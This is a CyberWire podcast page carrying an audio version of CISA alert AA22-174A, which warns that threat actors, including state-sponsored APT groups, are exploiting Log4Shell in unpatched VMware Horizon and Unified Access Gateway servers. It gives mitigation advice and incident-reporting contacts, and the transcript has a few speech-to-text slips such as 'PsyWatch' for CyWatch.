CyberWire Daily - CISA Alert AA22-174A – Malicious cyber actors continue to exploit Log4Shell in VMware Horizon systems. [CISA Cybersecurity Alerts]
Episode Date: June 24, 2022CISA and the US Coast Guard Cyber Command are releasing this joint Cybersecurity Advisory to warn network defenders that cyber threat actors, including state-sponsored APT actors, have continued to ex...ploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway servers to obtain initial access to organizations that did not apply available patches or workarounds. AA22-174A Alert, Technical Details, and Mitigations Malware Analysis Report 10382254-1 stix Malware Analysis Report 10382580-1 stix CISA’s Apache Log4j Vulnerability Guidance webpage Joint CSA Mitigating Log4Shell and Other Log4j-Related Vulnerabilities CISA’s database of known vulnerable services on the CISA GitHub page See National Security Agency (NSA) and Australian Signals Directorate (ASD) guidance Block and Defend Web Shell Malware for additional guidance on hardening internet-facing systems. All organizations should report incidents and anomalous activity to CISA’s 24/7 Operations Center at central@cisa.dhs.gov or (888) 282-0870 and to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K. Original release date, June 23, 2022.
CISA and the U.S. Coast Guard Cyber Command are releasing this joint advisory to warn network defenders that cyber threat actors, including state-sponsored APT actors, have continued to exploit the Log4Shell vulnerability in VMware Horizon and Unified Access Gateway servers to obtain initial access to organizations that did not apply available patches or workarounds.
Log4Shell is a remote code execution vulnerability affecting the Apache Log4J library and a variety of products, such as consumer and enterprise services, websites, applications, certain versions of VMware Horizon, and Unified Access Gateway servers.
The vulnerability enables malicious cyber actors to submit a specially crafted request
to a vulnerable system.
The request allows the malicious actors to take full control of the affected system.
VMware made fixes available in December 2021.
Since then, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing
VMware Horizon and Unified Access Gateway servers.
As a part of this exploitation, suspected APT actors implanted loader malware on compromised
systems with embedded executables, enabling remote command and control.
In one confirmed compromise, these APT actors were able to move laterally inside the network,
gain access to a disaster recovery network, and collect and exfiltrate sensitive data.
The alert documentation linked in the show notes provides the suspected APT actor's tactics,
techniques, and procedures, information on the loader malware, indicators of compromise,
mitigation actions, and incident response recommendations.
The information is derived from two related incident response engagements and malware
analysis of samples discovered on victims' networks.
CISA and U.S. Coast Guard Cyber Command recommend all organizations with affected systems
that did not apply available patches or workarounds to assume compromise
and initiate threat hunting activities using the IOCs and the two malware analysis reports provided in the alert resources.
If potential compromise is detected, administrators should apply the incident response recommendations
included in the alert documentation and report key findings to CISA. Thank you. or the FBI's 24-7 PsyWatch at 855-292-3937 or PsyWatch at FBI.gov.
This report was written by CISA, the United States Cybersecurity and Infrastructure Security Agency,
and edited and adapted for audio by the Cyber Wire as a public service.
Please visit www.cisa.gov to read the full report, which may include additional details, links, and illustrations.
A link to this report can be found in the show notes. This has been a CISA Cybersecurity Alert.